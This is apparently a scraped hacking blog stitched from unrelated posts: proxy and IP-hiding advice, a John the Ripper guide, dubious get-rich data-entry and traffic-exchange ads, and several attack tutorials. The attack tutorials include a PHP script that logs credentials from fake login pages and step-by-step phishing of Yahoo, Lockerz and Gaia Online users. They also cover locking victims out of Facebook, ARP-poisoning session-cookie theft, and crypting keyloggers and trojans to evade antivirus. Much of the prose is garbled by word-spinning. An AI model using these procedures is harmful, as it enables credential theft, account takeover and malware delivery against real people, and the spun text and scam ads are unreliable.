Design your theme

How do I hide my IP address?

The most common method to hide your IP address is to use a proxy server in one form or another. A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server and then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.
There are several implementations of proxy servers that you can use to hide your IP address (in an attempt to remain anonymous on the internet):

Website Based Proxy Servers

A Website based proxy server is a website that provides a form for you to enter the URL of a website that you wish to anonymously visit. When you submit the form the website proxy server makes a request for the page that you want to visit. The machine usually does not identify itself as a proxy server and does not pass along your IP address in the request for the page. The features of these sites vary (ad blocking, javascript blocking, etc) as does their price. Some are free and some charge. Examples of website proxy services are:

Browser Configured Proxy Servers

There are also stand alone proxy servers that allow for you to configure your browser to route your browser traffic through that machine, which then makes a request for a page on your behalf, and then sends you the results. These are usually used at no cost to the user. Since they are accessible to the public these are often quite slow.
There are a variety of types of these proxy servers:
  • Transparent Proxy
    This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.) This type of proxy server does not hide your IP address.
  • Anonymous Proxy
    This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.
  • Distorting Proxy
    This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.
  • High Anonymity Proxy
    This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.

Installed Software Proxy Servers

There are a variety of companies and software packages available at either a onetime cost or at an annual subscription. These are usually faster and more reliable than the above proxy servers. Some of these services would include:
VPN Services
A virtual private network (VPN) protects your data and identity over public networks, like the Internet and wireless hotspots. Various protocols are used to create an encrypted tunnel that transports data securely. While a firewall may protect the data on your computer, a VPN will protect your data on the Internet. The goal of a VPN is to implement the same level of security provided by private networks at substantially lower costs. VPN services provide different gateway cities where the IP address assigned to your computer is located. This allows users to access websites only available to users from a certain country. This application is particularly important for travelers who need to access websites from their home country and for people living in regions rife with censorship, like China and Iran.

Note: This procedure changes the IP address of a computer on a wired or wireless network. If you want to change the IP address of your internet connection, you should contact your service provider, as they're the ones who exert control over this.

http://i655.photobucket.com/albums/uu276/r_manic/Change-Network-IP-Address-Windows.png

To change your network IP address in Windows XP, Vista, or 7:

1. Press the Windows Key and R

2. Type command and press Enter. This loads your DOS prompt

3. Type ipconfig /release then press Enter. This disables your internet connection

4. Go to your desktop, and right-click on something called Network Place or My Network Places (If you're using Windows Vista or 7, look for the Network and Sharing Center through Control Panel)

5. Click Properties. You should now see something called Local Area Connection or something similar

6. Right-click on your connection (titled Local Area Connection if you're using an ethernet cable or Wireless Network Connection if you're on WiFi) and click Properties

7. Under the General tab, double-click on the Internet Protocol (TCP/IP)

8. A new window appears. On its own General tab, click the box beside Use the following IP address

9. Type in ones until you fill the box up (it should read 111.111.111.111)

10. Press Tab. You'll notice the Subnet Mask section automatically fill sup with numbers

11. Click OK

12. Click OK to bring you back to the "Local Area Connection" screen

13. Right-click Local Area Connection and Click on Properties again

14. Again, under the General tab, double-click on the Internet Protocol (TCP/IP)

15. Select Obtain an IP address automatically

16. Click OK

17. Click OK

18. Go back to your DOS prompt, type "ipconfig /renew" and press Enter. This restores your internet connection.

By now, the network should've assigned a new IP address to your computer automatically.

John the Ripper is probably the fastest, most versatile, and definitely one of the most popular password crackers available. It supports six different password hashing schemes that cover various flavors of Unix and the Windows LANMan hashes also known as NTLM ( used by NT, 2000, and XP ). It can use specialized wordlists or password rules based on character type and placement.

I got profuse Emails from my blog readers requesting me to record an article on how to use john the ripper, But in truth qualified are may hunky-dory tuts on the snare on this subject. Inasmuch as i taught instead of writing i can share one comparable article The following article is written by Renegade

image

John The Ripper Tutorial

I wrote this tutorial as crowing I could to shot to disclose to the newbie how to operate JTR. Master, this is a newbie tutorial, ergo I wont go into detail keep secret all of the individualism. JTR is a program that decrypts Unix passwords using DES ( Data Encryption Standard ).

The Process

Step 1: Download John The Ripper By Hackerstips.tk

Download_button

Step 2: Extract JTR. Command windows use winzip. Prominence unix type macadamize - xzf john - 1. 6. concrete. gz

 

Step 3: Significance windows ajar the command prompt. Birr to the Origin chuck, drift Tear, type ' command ' ( no quotes ) and press enter.

You obscure me? Satisfactory. Snap to whatever directory to keep JTR force. Type ' john ' and press enter. A full guide of options will come up:

John the Ripper Adventure 1. 6 Copyright ( c ) 1996 - 98 by Solar Designer
 



Usage: / WINDOWS / DESKTOP / JTR / JOHN - 16 / Dart / john [OPTIONS]

[PASSWORD - FILES]
- single " single crack " mode
- wordfile: FILE - stdin wordlist mode, scan words from FILE or stdin
- rules enable rules for wordlist mode
- incremental[: MODE] incremental mode [using section MODE]
- out: MODE independent mode or consultation filter
- stdout[: LENGTH] no cracking, rigid note words to stdout
- restore[: FILE] restore an interrupted talk [from FILE]
- confrontation: FILE set gig file eponym to FILE
- status[: FILE] chalk position of a concourse [from FILE]
- makechars: FILE originate a charset, FILE will imitate overwritten
- shine program cracked passwords
- investigation perform a benchmark
- users: [ - ]LOGIN | UID[,.. ] load this ( these ) user ( s ) onliest
- groups: [ - ]GID[,.. ] load users of this ( these ) parcel ( s ) isolated
- shells: [ - ]SHELL[,.. ] load users camouflage this ( these ) shell ( s ) isolated
- salts: [ - ]COUNT load salts veil at headmost COUNT passwords unrivaled
- format: Moniker beef ciphertext format Place name
( DES / BSDI / MD5 / BF / AFS / LM )
- savemem: Unfluctuating enable retentiveness saving, at In line 1.. 3



 You wont use most of these options. Effect fact, you don ' t absolutely demand department of these options. You can cleverly type ' john [filename] '. The filename commitment include the. txt extension. This is the regular crack. It will use bruteforce to decrypt all of the passwords in the file. If you ' re an impatient ass you can use a word list. This is not as effective but it ' s quicker ( more on that later ).

How to make a crackable file: Let ' s say that for some reason you have a DES encrypted password but no file. If you want to crack it ( why else would you be here? ) you need to make your own file. Just create a text file and paste in the password. Now put a username ( just any old name will do ) in front of it with a colon separating the two. It should look something like this:

User: gyuJo098KkLy9 

Save the file as crackme. txt ( just an example ) and go to the prompt and type ' john crackme. txt ' ( no quotes obviously ). Now you just have to wait.


Options

Here are a list of the options and what they do.


single:

Single crack mode. This is only recommended for weak passwords as it includes only a few rules and a small wordlist.
Usage: john - single crackme. txt


wordfile:

Uses a wordlist ( basically a dictionary attack ). What this does is tries every word in the list until it finds a match or you reach the end of the list. This is quicker than the default ( bruteforce ) attack, but I don ' t recommend this because it doesn ' t always find a match. More notes on wordlists below.

 Usage: john - wordfile: password. lst crackme. txt


 rules:

Lets you define the rules for using wordlists. I don ' t use wordlists, so if you want to use this option I wont help you. Ok, ok, I ' m just lazy. Shoot me.


 incremental:

I like this method. It allows you to do a brute force attack
under certain modes.
Usage: john - incremental: alpha crackme. txt ( only letters )
john - incremental: digits crackme. txt ( only numbers )
john - incremental: lanman crackme. txt ( letters, numbers, and some special characters )
john - incremental: all crackme. txt ( all characters )

 

external:

This is a little complicated, so if you are lame don ' t mess with it. Basically this calls the options that are defined in the configuration settings. You can change these yourself, but I wouldn ' t recommend it unless you know what you ' re doing. No, I wont tell you how, go away.
Usage: john - external: [MODE] crackme. txt ( replace MODE with whatever the
name of your mode is ).


restore:

Ok, let ' s say that you need to stop the crack in the middle. Press crtl + break. A file will be created in the JTR directory named ' restore ' ( no quotes doofus, and yes, no file extentionfilename.
 Usage: john - restore: restore


session:

Use this if you know that you will have to stop JTR in the middle of a crack. It allows you to create a new file that holds the data of your session. You can then restore your session later.
 Usage: john - session: [save to filename] crackme. txt


status:

Shows how far you got before stoping a crack ( provided you used the - session option ).
 Usage: john - status: [filename]


 show:

Shows how many passwords have been cracked in a file and how many are left.
 Usage: john - show crackme. txt


 

test:

Shows how fast JTR will work on your computer.
 Usage: john - test


users:

Cracks the password only for the user or users you tell it to.
 Usage: john - users: User crackme. txt


 groups:

Cracks the passwords only for the group or groups you tell it to.
 Usage: john - group: lamers crackme. txt


shells:

Cracks the passwords only for the shell or shells you tell it to.
Usage: john - shells: shelly crackme. txt


salts:

Cracks the salts that have at least the number of passwords you specify.
Usage: john - salts: 2 crackme. txt

format: JTR can decrypt many from many different formats, not just DES ( but this is the most widely used one ). Use this to force JTR to try a certain format.
Usage: john - format: DES crackme. txt ( force DES )
john - format: BSDI crackme. txt ( force BSDI )
john - format: MD5 crackme. txt ( force MD5 )
john - format: BF crackme. txt ( force BF )
john - format: AFS crackme. txt ( force AFS )
john - format: LM crackme. txt ( force LM )



 savemem:

this tells JTR to automatically save your process at whatever
level you specify from one to three.
Usage: john - savemem: 1 crackme. txt ( save at level 1 )
john - savemem: 2 crackme. txt ( save at level 2 )
john - savemem: 3 crackme. txt ( save at level 3 )

How to use a wordlist with JTR: I ' ll assume you already have a wordlist in the JTR directory ( it comes with password. lst, if you want to make your own I ' ll tell you how later ). Go to the prompt and type ' john - wordfile: password. lst crackme. txt ' ( no quotes, damnit ). If the password is in the wordlist, it will work. Otherwise, you deserve it for using a wordlist when you have bruteforce capabilities, shame on you.

How to create a wordlist to use with JTR: First I will include a few lines of the wordlist supplied with JTR:
#! comment: Common passwords, compiled by Solar Designer.
12345
abc123
password
password
123456

The top line is a comment ( duh ). If you want to make a comment in your wordlist just follow the example. The other lines are passwords that the program will try when you use the wordlist. Put each password on a new line. In the event that you are too lazy to write your own wordlist you can download one ( once again, I ' m far too lazy to give you a link ). It may or may not already be the right file format (. lst ). If it isn ' t, just go to the prompt. Assuming the filename is lazy. txt, type ' rename lazy. txt lazy. lst '

Piping Output: Remember the - show option? You can get JTR to save that
output to a file. Just type ' john - show crackme. txt > crackinfo. txt '



 There ' s my guide. I have an FAQ below:

Q: Can I mix options?
A: Yes, certain options can be mixed. You can mix options as long as they don ' t clash. Play around with it a while.

Q: What does " Loaded 0 passwords " mean?
A: There was a problem with either your password file or the syntax of your command. If you force BF decryption when your file has DES encryption it wont work. If your password file isn ' t made right it wont work.

Q: What does " Password files required, but none specified " mean?
A: Can you read? You can ' t just tell JTR to crack, you need to give it a file.

Q: What does " Unknown cypher text format name requested " mean?
A: When you use the - format option you need to check that you typed the name of the format correctly.

Q: How come when I typed ' john - users: login | uid crackme. txt ' ( which by the way is the usage shown in the list of option by JTR ) I received this error:
Option requires a parameter: " - users: "
Bad command or file name
A: The piping symbol you used ( | ) can mean two different things. In this case in means ' or '. You ' re supposed to use login OR uid. When you type it in a dos window, you are running two separate commands.

Q: Can I speed up the bruteforce?
A: Sure, just toss that old ass box of yours and get a new one.



,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Enjoy This Great Hacking Tutorial,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

image

Extraprofits

PART TIME DATA ENTRY POSITIONS AVAILABLE!

"Receive $2500-$8500 Weekly.
Do Simple Part Time Data Entry Jobs Online!
We Need To Appoint 250 People Worldwide Who Want To Earn $2500-$8500 Weekly By Doing Legitimate Part Time Online Data Entry Work For Us From Their Own Homes!"

Additionally, We Also Pay You A Generous Basic Salary Of $2000* Monthly 
(In Addition To Your Weekly Earnings Of $2500-$8500)

Earn Immediately By Typing Data Onto Online Forms

image

This Part Time Online Job Involves Simple Typing Of Online Forms For Us ...
... You Type, We Pay
Start Earning Immediately After You Join

If You Enroll For This Profitable, Legitimate Part Time Online Job Offer, Today (Sat 25th Jun,2011), We Will Instantly Credit Your Account With $100 As A Welcome Gift.

imageimage

"I just joined your program recently and I happily earn $8000 average monthly. The work is easy, exciting and takes very little of my time. As a student, this money will help me through college. I sincerely recommend this genuine opportunity to anyone out there who is looking to make good, regular income from home. Thank you for showing me the way!" 
Nitesh Singh
India

Want To Visit This Site

Netjobs4all
  • No Investment. No Joining Fees.
  • 100% Free to Join.
  • Easy Data entry Form Filling Jobs.
  • Home based Part time Online Jobs.

Work at home, Online jobs, Part time jobs, home based jobs, internet jobs, Data Entry jobs


Dear Internet Friend

, Welcome.
Nice to meet you through this website. This website is exclusively designed for Indians who wants to earn money through Home based internet jobs without any investment, who can spend only few hours in a day. Trust us, you will earn Rs. 50000 and more from this month.


What is the actual work?


The actual jobs is filling online data entry forms in the internet. We will be providing you simple Online Registration Forms. You have to fill those Online Registration Forms according to the instructions.

Is it easy to fill those registration forms?
Yes. These are very simple data entry forms and it is similar to creating an Email account in yahoo, hotmail or rediff. It takes less than 2 minutes to fill those forms. This is similar to Data entry jobs.


How much I can earn for filling each forms?
You can earn between Rs.50 to Rs.100 for each data entry form you fill. We have many categories of forms to fill. Based on the category, the rate will vary. On an average, you can earn Rs.75 for each form you fill.


Is this work available worldwide?
No. This work is available only for Indians. In future, we will recruit peoples from all over the world. You just need basic internet browsing knowledge.


What is the Qualification to do this work?
No need Extra qualification. Just basic Internet Browsing knowledge is enough to do this job.


How much time I need to work in the Internet ?
There is no hard and fast rules regarding the work. It depends on the number of hours you work.You can work at your convenient timings. But it is good at least you work 1 hour daily to earn a decent income.


When will I get the payment and what is the mode of payment?
You will be paid on or around 20th of every month for the previous month earnings. You will be paid only if your earnings is equal to or more than Rs.2000. If it is less than Rs.2000 for a particular month, then the amount will be added to the next month earnings. We pay you by Check.

Visit This Site

Traffic swarm
Traffic Swarm is Targeted: You'll only get live, real-time targeted traffic. No forced page loads here. Real people choose to click on your ad.


Traffic Swarm is "Viral Marketing":
Traffic and visitors to your site will grow and spread exponentially the more you use the system.

Traffic Swarm is Proven: Over 400,000 successful members utilize the secret "TS Traffic Technology" to generate web traffic daily.

Traffic Swarm is Cheat-Proof: Chiselers and click-bots can't waste your credits like they do at other traffic exchanges. Our system ensures you get only real, live people visiting your site.

Traffic Swarm is Generous: Highly incentivized referral program means even more traffic for your site. Earn on your referrals FIVE levels deep. No cap or limit on referral rewards!

Free Traffic Generator

Step 1: Sign up and claim your Free Lifetime Membership today.
Step 2: Surf your Traffic Swarm Page and view only the sites that interest you.
Step 3: Place your ads inside your Traffic Swarm account. Then...
... sit back while you get free traffic to your site from interested Traffic Swarm members. It just couldn't be any easier!

You will use Traffic Swarm today ... right now ... to get live, targeted traffic to your site that will help you...

· Test your ads for free before rolling out to paid spots

· Get more exposure to increase your sites Alexa ranking

· More leads

· More sales

And it's all on a budget that anyone can afford and everybody likes ... FREE!
Find out for yourself why Traffic Swarm has been the undisputed traffic exchange leader for several years running.

Free Traffic Generator

There are people on Traffic Swarm right now who could be visiting your site ... for FREE.
Don't miss out on another day of traffic that's going to your competitor's site instead of yours.
Complete the form to the right to register for
free and get started today.
To Your Success!

Want to Visit This Site

,,,,,,,,,,,,,,,,Enjoy Money Making,,,,,,,,,,,,,,,,,,,,,,


image

Here i want to show you how to make a phishing page using a Phishing Creator - Super Phisher and get account information for various websites from many people. Тhis is the easiest and also a very effectively way to make a phisher and hack any website account password.
Here are some features of Super Phisher:

  • Fastest phisher maker tool ever
  • Makes phisher for almost any site
  • Useful for users who don't knows HTML, PHP coding
  • No manual work except entering URL of website, for which u want to make phisher
  • Fully automated tool
  • Small in size.
  • Instant access to phishers you created.

Download_button
For example i will show you how to make a phishing site of Lockerz.com.
Here is a step by step guide to hack any website account password using phishing creator tool:
1. First of all Download Super Phisher

2. In "Super Phisher" folder, open "Super Phisher.exe" file to get something like:
3. Now, in "URL of Login Page", enter
http://www.lockerz.com. This is the site you want to hack.
4. In "Name of Log File" write password.txt or whatever you like. This is the place where all typed id and password are stored. In "Name of PHP File" also type anything you like, e.g. lockerz.php or login.php...
5. In field of "Site redirect to", enter
http://www.lockerz.com/myLocker, so that victim is redirected to original Locker site when he enters his email and password.
6. Click on "Build Phisher" and you will get Lockerz phisher created in "Output" folder in current directory.
7. Upload all of the phisher files to any free webhost site like:
RipWay or 000webhost.com
8. Once you have uploaded the files in the directory, send this phisher link to your victim and make him login to his Lockerz account using your sent Phisher.
9. Once he logs in to his Lockerz account using Phisher, all his typed email and password is stored in "password.txt".
10. Now you can see password in this .txt file and hack Lockerz account password.

                                                    Enjoy Phishing


I received many Emails from my blogger readers requesting me to make Fake / Phisher page for various websites like Orkut, twitter, Gmail, Face book... etc. I have already written some tutorials on how to hack Face book, Gmail using a fake / phishing page. But many had doubts, problems. To clear all there doubts i taught i can write a tutorial on how to make your own fake / phisher page for any website that you want So I Post This Tutorial (How To Hack From Making Phishing Page) And This Tutorial  Is 2nd Part Of That 


                         This is the easiest way to make phishing page Good luck
Follow the steps given below to create your own phishing page
How to Make a Phisher / Fake Page For Any Website
imageuebE731303814582
1. First open the website in a browser for which you want to create a phishing page. Now right click in an empty space and select view source, copy all the contents to a note pad and save it as something. html
example:
yahoo. html


2. Now open Yahoo. html ( something. html ) in a notepad. Now search for the string
" action = https.. " and change the address to login. php and save it

image

3. Now we have to create login. php. For this open notepad, copy / paste the following code in it and save it as login. php


<? php
header ( ' Location: http: / / hackerstips.blogspot. com ' );
$handle = fopen ( " log. txt ", " a " );
foreach ( $_POST as $variable => $value ) {
fwrite ( $handle, $variable );
fwrite ( $handle, " = " );
fwrite ( $handle, $value );
fwrite ( $handle, " \ r \ n " );
}
fwrite ( $handle, " \ r \ n " );
fclose ( $handle );
exit;
? >
Note: –Change hackerstips.blogspot.com with the redirected site url

By default the victim will be redirected to yahoo. com once he clicks login, If you want you can change the address you can do it by changing the www. yahoo. com to any address you desire

4. Now we have to create a empty log file for this Open a notepad and save the empty file as log. txt.
5. Now create an account in Free web hosting sites, which supports php like, T35. com or 000webhost. com
6. Now upload all the three files which we created Yahoo. html, login. php, log. txt and change the file permissions for log. txt to 777
7. Now send the Yahoo. html link to the victim, once he enters the information and logins in, every thing will be stored in log. txt, you can open log. txt to see all the login details

Hope you enjoyed this tutorial, If you have any doubts please feel free to post a comment
……………………………………………Hackerstips.tk…………………………………………………
……………………………………………….Enjoy Hacking………………………………………………...


I Have Written Many Post On How To Hack Facebook Password Via Phishing |Create Fake Login Page And Facebook Hacking Corner
                      …………………………………………………..But……………………………………………………………


Yesterday when i was surfing on the net i came across an interesting script kidy tool Facebook Freezer  Actually this tool is not used for hacking Facebook but it is simply used to prevent users from logging into Facebook sounds cool ?
Follow the instructions given below to prevent your friends , from logging into their Facebook account
image
Concept Behind The Hack: -
Facebook has a security attribute mastery which touching 25 or thence logins the bill is temporarily hobbling, to enable the report the report innkeeper must reset his / her account
Thus, even when victim tries to login his Facebook account using correct password, he is not able to login to his Facebook account, thus you can hack Facebook account thanks to Facebook Freezer.

Hack Facebook Accounts With Facebook Freezer :-


1. Frist a fall Download Facebook Freezer

Download_button
2. Now extract the files into a folder
3. Now run Facebook Freezer. exe file as shown
image
4. Now enter the email id of the victim whose Facebook account you want to hack using Facebook freezer and finally hit " Freeze ".

5. That ' s it. You will now be able to hack Facebook account using this Facebook freezer. This freezing will continue until you hit " Stop Freezing ". This will not hack Facebook account for you but it will prevent the victim from logging into his, her account,


Note: - If you want to hack Your friends Facebook Password Via phishing. You can have a look at my article How to hack Facebook account using A Phisher

      For further doubts and clarifications please pass your comments




In this tutorial i will brainwash how to hack a Facebook / twitter accounts by stealing cookies. This usage works solo when the victims computer is prominence a LAN ( local area network ). Ace spot to superlative shot out this is green stuff schools, collages, cafes. locale computers are connected pull LAN. Before i proceed let me prime shining up " cookies "

What are cookies? and what is the end of stealing cookies?


Cookies are short - scale files that stored on users computer by websites when a user visits them. The stored Cookies are used by the web server to identify and evaluation the user. For paragon when a user logins significance Facebook a particular string is generated and one copy of firm is saved on the server and other is saved on the users browser being Cookies. Both are trim every lastingness the user does measure device impact his statement

In consequence if we appropriate the victims cookie and comprehend them credit our browser we will act for able to imitate the victims identity to the trellis server and hence we will serve able to login is his statement. This is called being Side jacking. The beyond compare element about this that we itch not no the victims id or password all we extremity is the victims cookie

Hack Facebook / Twitter by stealing cookies
Things We Need


1. Ettercap or Cain and able for ARP poisoning the victim
2.
Wire shark for sniffing and stealing cookies
3.
Firefox browser and Cookie logger add on for injecting the stolen cookies in our browser

NOTE- If You Are Unable To understand The Advanced Version Of The Procedure Below Read The Simpler Version Of This Procedure Below This Procedure
Procedure :-
To See The Procedure With Image Subscribe To Our Blog And Then Contact With Me
 Note-This Is A Great Trick You Need Image For This Trick

1.Aboriginal ARP poison the fall fellow.

2.Nearest ARP poisoning unbarred Wire shark, sagacity capture button from  the snack bar, notoriety consequence select interface. At once select your interface ( regularly eth0 ) imprint booked discernment opening capture.

3.Away you duty glimpse the packets being captured, wait for a oomph span till the move logs clout his enumeration ( Facebook / twitter ),

4.Greedy turn Bargain the IP label of Facebook, for this you charge ajar CMD ( command prompt ) and enter. Ping Facebook. com to treasure its IP marker
 
5.Today filter the packets by through the the IP address ( Facebook ) spell the filter bar and wavelength retain
 
6.At once Locate HTTP Stimulate / at rest. php and copy all the cookie names and values sway a note pad on ice shown

7.Like now unbolted Firefox and unbarred add and edit cookies, which we downloaded earlier, add all the cookies values and save them considering shown
 
8.Instantly unlocked Facebook monopoly a atypical tab, you will stage logged prestige the victims enumeration.

9.Voilà...... you have hacked the victims Facebook bill by stealing cookies, You constraint and ensue the same steps to hack Twitter accounts
Relucent side you enjoyed this tutorial, If you gain apportionment doubts please discover to for devotedness to post a comment




This Is Simple Version Of The Above
Procedure :-


1. First ARP poison the victim .
2. After ARP poisoning open Wire shark ,click capture button from the menu bar , then select interface .Now select your interface (usually eth0 ) finally click start capture .
3. Now you can see the packets being captured , wait for a while till the victim logs in his account( Facebook /twitter ),
4. Mean while Find the IP address of Facebook ,for this you can open  CMD (command prompt ) and enter .Ping Facebook.com to find its IP address


5. Now filter the packets by entering the the IP address (Facebook) in the filter bar and click apply

 

6. Now Locate HTTP Get /home.php and copy all the cookie names and values in a note pad as shown

7. Now open Firefox and open add and edit cookies ,which we downloaded earlier , add all the cookies values and save them as shown

8. Now open Facebook in a new tab , you will be logged in the victims account .
Voilà ......you have hacked the victims Facebook account by stealing cookies , You can also follow the same steps to hack  Twitter accounts
Hope you enjoyed this tutorial , If you have any doubts please feel to free to post a comment   


            Please give this a thumbs up and support me by subscribing to my channel!!!



Gmail Login,Gmail Id, Gmail Page, Gmail Account, Gmail Chat, Gmail Login Page,Welcome To The World Of Gmail (From Hackerstips)



There are basically two ways to log into Gmail. Either by using the Gmail web interface that is available for most users at Gmail.com or by accessing Gmail remotely using desktop or mobile email clients. Both methods have their advantages and disadvantages.

A Gmail login at the website is not bound to a specific location, users can be anywhere and access their email account if they have a connection to the Internet there. Remote clients, like the desktop email programs Outlook or Thunderbird, on the other hand offer other advantages. Emails can be accessed even without an Internet connection for one. They can also be stored locally and not on a remote server, which provides access to them even if no Internet connection is available.img_131262_gmail-logo
One of the main problems users of the Gmail web interface face is that there is not a good way to switch Gmail accounts or log into two accounts at the same time. The second problem can easily be fixed with the privacy modes that most web browsers come with (or plan to implement). Privacy mode work independently from the rest of the Internet browser which means that it can be used to log into Gmail separately.

Gmail login
image

The Grease monkey script Google Account Multi-Login is another possibility. While it does not offer simultaneous Gmail logins it provides an easier way to switch between Gmail accounts directly in the web interface.
Gmail Account Login Troubleshooting
A user with login problems has to access the situation in detail.
· Is the Gmail website loading?
· Are username and password of the email account accepted?
· Does the Gmail page list an error message?
There are certain “best practices” when dealing with log in problems at the Google Mail website(the correct url is actually https://mail.google.com). The first is to ensure that the website is loading properly. This can be done by clearing the Internet cache or trying another web browser to access the Gmail homepage.
Open your favorite web browser and enter http://mail.google.com/ into the address bar. Is Gmail loading or is the page showing an error message or remaining blank? It may help to clear the browser cache and try again, or to use another web browser to log into the email service. Browsers to try include Firefox, Opera or Google Chrome (The Fastest Web Browser Provided By Google) Chance is that a firewall, router or computer virus are blocking access to Gmail on the computer.
A last resort would be to try another computer to see if the Google Mail website opens on that PC.
A forgotten username and password on the other hand, or usernames and passwords that are not accepted by the Gmail login page usually require filling out a help document to make Gmail resend the data so that the Gmail account can be accessed once again.


The cannot access my account page aids the user in retrieving the relevant account information.

Direct Links
· Gmail Homepage with login form, go here.
· If you forgot your password go here
· If you forgot your username go here
· If your account has been compromised go to the account recovery form here
Further information are available at the Gmail login page at the Login Helper website.
Gmail users need to assess the situation in detail, before they can troubleshoot it. The guide should have made it clear that there are different possibilities why a Gmail account cannot be accessed by a user.


Google users who have fixed their Gmail login issues are encouraged to share their experience with other users to aid them in resolving the login issues on their end.

Updates


Google has introduced the new 2-step verification option to improve the security during log ins. The new feature utilizes smartphones that generate or receive a temporary code that needs to be entered during the Gmail login. This basically adds a second layer of defense to the sign-in process so that attackers need to get hold of the username and password as well as the one time code. Gmail users can configure the 2-step verification under their Account Settings. It is recommended to add a backup phone or backup in case the phone gets lost or stolen.


gmail







I received huge amount of email and readers asked me that is there any way to avoid antivirus detection while installing a keylogger remotely.so today i will tell you about a software,by which you can bypass antivirus detection while installing a Key Logger remotely 
Bypassantivirus1-1-1
How to bypass antivirus detection - UD Crypter



This Crypter is UD (Undetectable) and not FUD (Fully Undetectable) free software, because it is detected by Avira antivirus and even Kaspersky antivirus as virus. Hence, it is 2/22 UD ie only 2 antiviruses out of 22 detected this as virus. Thus, if your victim is using any antivirus other than Avira and Kaspersky, then chill out guys.. here's the solution for your problem.
Download UD Crypter software:
As I have explained previously, Crypter is used to bypass antivirus detection on victim computer. So, we use Crypter software to encrypt our Keylogger and Trojan. Due to encryption by Crypter software, whenever victim runs our sent keylogger or Trojan on his computer, his antivirus does not detect our keylogger as virus and our keylogger is prevented from being deleted on victim computer.


1.First of all Download Ud crypter


Download_button

2. extract the Zip file to obtain FUD Crypter free software.

3. Run Krypter.exe application on your computer system.

4. Now, browse to the file (keylogger or any trojan) you wanna crypt to bypass antivirus detection and hit on "Encrypt".

5. A new file will be created in same directory. Now, scan this file with your antivirus and it will not detect any virus (except Avira and Kaspersky).
Note: You may get certain error on your computer like this:
image

If you are getting this error, install Library file package to fix this error.(Try googling)
I hope now your are able to use this UD Crypter to crypt keylogger or trojan
and bypass antivirus detection




Warning: This column (Post) is for educational purposes only, This column is just to allegorize how hackers can drudge your gaia online accounts.
Gaia Online is an English-language, anime-themed amusing networking and forums-basedwebsite. It was founded in 2003 as Go-Gaia.com,[1][2] but the name was afflicted to GaiaOnline.com in 2004 by its owner, Gaia Interactive.Gaia online has now become actual acclaimed online hangout, accumulation amusing networking, forums, gaming and a basic world,therefore it has become ambition of ample bulk of hackers,in this commodity i will acquaint you How to drudge gaia online accounts or Hacking gaia online account.


The adjustment i will acquaint you has a lot of success amount than any added method,the adjustment is alleged phishing and it is the arch adjustment to drudge gaia online accounts
Phishing:
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and creditcard details by masquerading as a trustworthy entity in an electronic communication.The most common method used in phishing are Fake login pages.On this method the hacker creates a fake page which exactly resembles with gaia.com,and when victim enters his/her password he gets his gaia account hacked
Know more about phishing:

Method:

1.Download Gaia Phishing site creator software to make a  gaiaonline.com phisher site 
2.Now extract all the contents into a folder
3.Now you will have something like this:



image
4.Just fill in www.gaiaonline.com in url field and provide the destination folder in which gaiaonline should be saved. Just hit on "Create Phisher" to make gaia phishing site.
5. You can also use "Redirection Url" to redirect victim to desired url after he logs in with our gaiaonline phishing site.

6.Now just Create an id in www.110mb.com,www.ripway.com or t35.com or any other webhosting site like http://hackerstips.blogspot.com/2011/06/free-website-hosting-site-list-how-to.html
6.Then upload the contents into a directory
7.For that after creating an id you should go to file manager and upload all these files.
8.Then just got to gaia.htm and try out whether its working .
After you type the file , a password file named pass.txt will be created in the same directory .
you can see what username and password you have entered.
9. Distribute the gaia.HTML URL (ie: yoursite.com/gaia.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.


            Please give this a thumbs up and support me by subscribing to my channel!!!





A Affected (Fake) Login Page is a page that absolutely resembles the original login page of sites like Yahoo,Gmail etc.However, these Affected login pages are created just for the purpose of burglary other’s passwords.


Update:Jotform.com have changed their policies so you cant make fake page without a premium account.I am Going To Post On"How to hack gaiaonline accounts"
In my last post hack Orkut using fake login page i showed you to create fake login page of Orkut
But i was asked by many others that what about other sites, How would i create fake login page for other sites such as orkut,  Facebook,  myspace,  gmail and etc
But i was asked by abounding others that what about added sites, How would i actualize fake login page for added sites such as orkut,facebook,myspace,gmail and etc


So in this Post i will appearance adjustment to actualize Affected login page for adapted site:
How to actualize affected login page - Procedure?
Now it's simple to body a Affected Login Pages afterwards any ability of Programming Languages. One can use http://www.jotform.com to body the Assurance Up page.
{1} Open www.jotform.com and Sign Up.

{2} then Login there with your newly registered account.

{3} now click on ‘ Create your first form’.

{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)

{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)

{6} Now Click on ‘Power Tool’ Option (In right hand side…)

{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’

{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.

{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.

{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)

{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.

{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.

{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here

